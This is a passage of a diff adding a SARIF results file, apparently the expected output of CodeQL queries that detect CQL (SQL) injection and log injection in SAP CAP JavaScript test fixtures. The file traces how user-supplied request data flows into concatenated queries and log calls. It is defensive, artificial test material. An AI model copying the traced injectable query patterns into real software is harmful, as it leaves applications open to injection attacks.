+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b41554298e90b620:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", 
+ "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 58, + "endColumn" : 62 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "`ID=${book}`" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 15, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... 
book}`)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "967d7be3edc97a9e:1", + "primaryLocationStartColumnFingerprint" : "30" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 
8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 57 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 45, + "endColumn" : 57 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" 
: 17, + "startColumn" : 20, + "endColumn" : 58 + } + }, + "message" : { + "text" : "SELECT. ... + book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 17, + "startColumn" : 11, + "endColumn" : 58 + } + }, + "message" : { + "text" : "query2" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 18, + "startColumn" : 37, + "endColumn" : 43 + } + }, + "message" : { + "text" : "query2" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1c132adaa6986472:1", + "primaryLocationStartColumnFingerprint" : "20" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", 
+ "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 60, + "endColumn" : 64 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 52, + "endColumn" : 64 + } + }, + "message" : { + "text" : "'ID=' + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 20, + "startColumn" : 27, + "endColumn" : 65 + } + }, + "message" : { + "text" : "SELECT. ... 
+ book)" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "144d55d233768c80:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 
8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 59, + "endColumn" : 63 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 17, + "endColumn" : 63 + } + }, + "message" : { + "text" : "CQL`SEL ... 
+ book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 27, + "startColumn" : 11, + "endColumn" : 63 + } + }, + "message" : { + "text" : "cqn" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 28, + "startColumn" : 39, + "endColumn" : 42 + } + }, + "message" : { + "text" : "cqn" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-sql-injection", + "rule" : { + "id" : "js/cap-sql-injection", + "index" : 0, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "This query depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1cd6f1adc2ef8f7c:1", + "primaryLocationStartColumnFingerprint" : "32" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", 
+ "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 56, + "endColumn" : 60 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 32, + "endColumn" : 60 + } + }, + "message" : { + "text" : "`SELECT ... + book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 18, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cds.par ... 
+ book)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 30, + "startColumn" : 11, + "endColumn" : 61 + } + }, + "message" : { + "text" : "cqn1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 31, + "startColumn" : 39, + "endColumn" : 43 + } + }, + "message" : { + "text" : "cqn1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "eae426bf8fad0192:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 34, + "endColumn" : 42 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 8, + "startColumn" : 13, + "endColumn" : 42 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 25, + "endColumn" : 29 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 11, + "startColumn" : 16, + "endColumn" : 29 + } + }, + "message" : { + "text" : "\"CAP:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 37 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a 
[user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e05b39891dddd161:1", + "primaryLocationStartColumnFingerprint" : "40" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 20 + } + }, + "message" : { + "text" : "req" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 17, + "endColumn" : 25 + } + }, + "message" : { + "text" : "req.data" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 13, + "endColumn" : 25 + } + }, + "message" : { + "text" : "$" + } + } + }, { + "location" : { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 18, + "startColumn" : 47, + "endColumn" : 48 + } + }, + "message" : { + "text" : "$" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 15, + "startColumn" : 24, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/cap-log-injection", + "rule" : { + "id" : "js/cap-log-injection", + "index" : 1, + "toolComponent" : { + "index" : 0 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 25, + "startColumn" : 16, + "endColumn" : 29 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4dc77ce4a9b7031e:1", + "primaryLocationStartColumnFingerprint" : "9" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
